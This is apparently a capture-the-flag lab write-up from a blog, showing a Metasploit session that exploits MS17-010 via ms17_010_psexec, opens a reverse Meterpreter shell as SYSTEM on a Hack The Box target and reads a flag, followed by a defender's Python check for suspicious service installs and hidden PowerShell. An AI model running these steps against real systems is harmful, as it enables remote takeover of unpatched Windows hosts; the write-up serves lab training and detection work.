Exploiting MS17-010 with msf
┌─[✗]─[root@parrot]─[/home/jiang/Desktop]
└──╼ #msfconsole
https://metasploit.com
=[ metasploit v6.3.5-dev ]
+ -- --=[ 2296 exploits - 1202 auxiliary - 410 post ]
+ -- --=[ 965 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: View advanced module options with advanced
Metasploit Documentation: https://docs.metasploit.com/
[msf](Jobs:0 Agents:0) >> search ms17_010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
Interact with a module by name or index. For example info 3, use 3 or use auxiliary/scanner/smb/smb_ms17_010
[msf](Jobs:0 Agents:0) >> use 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_psexec) >> show options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The Target port (TCP)
SERVICE_DESCRIPTION no Service description to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.186.66 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_psexec) >> set rhost 10.129.163.128
rhost => 10.129.163.128
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_psexec) >> set lhost 10.10.16.16
lhost => 10.10.16.16
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_psexec) >> run
[*] Started reverse TCP handler on 10.10.16.16:4444
[*] 10.129.163.128:445 - Target OS: Windows Server 2016 Standard 14393
[*] 10.129.163.128:445 - Built a write-what-where primitive...
[+] 10.129.163.128:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.129.163.128:445 - Selecting PowerShell target
[*] 10.129.163.128:445 - Executing the payload...
[+] 10.129.163.128:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 10.129.163.128
[*] Meterpreter session 1 opened (10.10.16.16:4444 -> 10.129.163.128:49674) at 2023-11-25 19:17:06 +0800
(Meterpreter 1)(C:\Windows\system32) > shell
Process 1220 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd ..
cd ..
C' is not recognized as an internal or external command,
operable program or batch file.
C:\Windows>cd ..
cd ..
C:\>cd use
cd use
The system cannot find the path specified.
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9850-1131
Directory of C:\
10/05/2020 05:43 PM <DIR> inetpub
07/16/2016 05:23 AM <DIR> PerfLogs
05/16/2022 04:08 AM <DIR> Program Files
05/16/2022 04:08 AM <DIR> Program Files (x86)
10/05/2020 05:51 PM <DIR> Users
10/05/2020 05:43 PM <DIR> Windows
0 File(s) 0 bytes
6 Dir(s) 30,157,791,232 bytes free
C:\>cd users
cd users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9850-1131
Directory of C:\Users
10/05/2020 05:51 PM <DIR> .
10/05/2020 05:51 PM <DIR> ..
10/05/2020 05:51 PM <DIR> .NET v2.0
10/05/2020 05:51 PM <DIR> .NET v2.0 Classic
10/05/2020 05:51 PM <DIR> .NET v4.5
10/05/2020 05:51 PM <DIR> .NET v4.5 Classic
10/05/2020 03:18 PM <DIR> Administrator
10/05/2020 05:51 PM <DIR> Classic .NET AppPool
11/20/2016 05:24 PM <DIR> Public
0 File(s) 0 bytes
9 Dir(s) 30,157,791,232 bytes free
C:\Users>cd Administrator
cd Administrator
C:\Users\Administrator>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9850-1131
Directory of C:\Users\Administrator
10/05/2020 03:18 PM <DIR> .
10/05/2020 03:18 PM <DIR> ..
10/05/2020 03:18 PM <DIR> Contacts
05/16/2022 04:17 AM <DIR> Desktop
10/05/2020 03:18 PM <DIR> Documents
10/05/2020 06:08 PM <DIR> Downloads
10/05/2020 03:18 PM <DIR> Favorites
10/05/2020 03:18 PM <DIR> Links
10/05/2020 03:18 PM <DIR> Music
10/05/2020 03:18 PM <DIR> Pictures
10/05/2020 03:18 PM <DIR> Saved Games
10/05/2020 03:18 PM <DIR> Searches
10/05/2020 03:18 PM <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 30,157,791,232 bytes free
C:\Users\Administrator>cd Desktop
cd Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9850-1131
Directory of C:\Users\Administrator\Desktop
05/16/2022 04:17 AM <DIR> .
05/16/2022 04:17 AM <DIR> ..
05/16/2022 03:19 AM 29 flag.txt
1 File(s) 29 bytes
2 Dir(s) 30,157,791,232 bytes free
C:\Users\Administrator\Desktop>more flag.txt
more flag.txt
HTB{MSF-W1nD0w5-3xPL01t4t10n}
C:\Users\Administrator\Desktop>^C
Terminate channel 1? [y/N] y
(Meterpreter 1)(C:\Windows\system32) > quit
[*] Shutting down Meterpreter...
All operations were carried out on a Hack The Box Academy target machine.
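The ms17_010_psexec run above ends by installing a service on the target that launches the payload (see the SERVICE_NAME options, "Selecting PowerShell target" and "Service start timed out"). The following defender-side check is an added example, not part of the original post: it scans constructed records shaped like Windows System log "service installed" events (Event ID 7045) and flags installs whose service name is a random run of letters or whose image path starts a hidden/encoded PowerShell. The record layout, field names and sample values are assumptions made for the example.

```python
import math
import re

# Constructed sample records modelled on Windows System log Event ID 7045
# (a new service was installed); not taken from the page or any real host.
SAMPLE_EVENTS = [
    {"id": 7045, "name": "Windows Update",
     "image": r"C:\Windows\system32\svchost.exe -k netsvcs", "account": "LocalSystem"},
    {"id": 7045, "name": "XnQpLwRkTzVb",
     "image": r"%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e BASE64PLACEHOLDER",
     "account": "LocalSystem"},
    {"id": 7045, "name": "Sysmon64",
     "image": r"C:\Windows\Sysmon64.exe", "account": "LocalSystem"},
    # A 7036 state-change event for the same name is not an install and is ignored.
    {"id": 7036, "name": "XnQpLwRkTzVb", "image": "", "account": ""},
]

SHELL_RE = re.compile(r"(cmd\.exe|%COMSPEC%|powershell(\.exe)?)", re.IGNORECASE)
HIDDEN_RE = re.compile(r"\s-(nop|w\s+hidden|e(nc(odedcommand)?)?\s)", re.IGNORECASE)


def entropy(s):
    """Shannon entropy in bits per character of the string s."""
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def random_looking(name):
    # psexec-style tooling defaults to a run of random letters with no spaces,
    # digits or punctuation; legitimate service names rarely look like that.
    return len(name) >= 8 and name.isalpha() and entropy(name) >= 3.0


def suspicious_image(image):
    # A shell launcher combined with hidden-window / encoded-command switches.
    return bool(SHELL_RE.search(image)) and bool(HIDDEN_RE.search(image))


def detect(events):
    """Return one alert per 7045 record that matches at least one indicator."""
    alerts = []
    for ev in events:
        if ev["id"] != 7045:
            continue
        reasons = []
        if random_looking(ev["name"]):
            reasons.append("random service name")
        if suspicious_image(ev["image"]):
            reasons.append("shell launcher with hidden/encoded command")
        if reasons:
            alerts.append({"name": ev["name"], "account": ev["account"], "reasons": reasons})
    return alerts
```

Both indicators fire on the second record; running either check alone is still useful, since a PowerShell target with a custom SERVICE_NAME only trips the image-path rule.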
Disclaimer
Do not attack websites without the owner's consent.
All of my articles are technical write-ups recorded for defensive purposes, and every operation was carried out in a lab environment. Do not use them for any other purpose; you bear the consequences if you do.
Unless otherwise stated, all articles on this blog are licensed under BY-NC-SA. Please credit the source when reposting!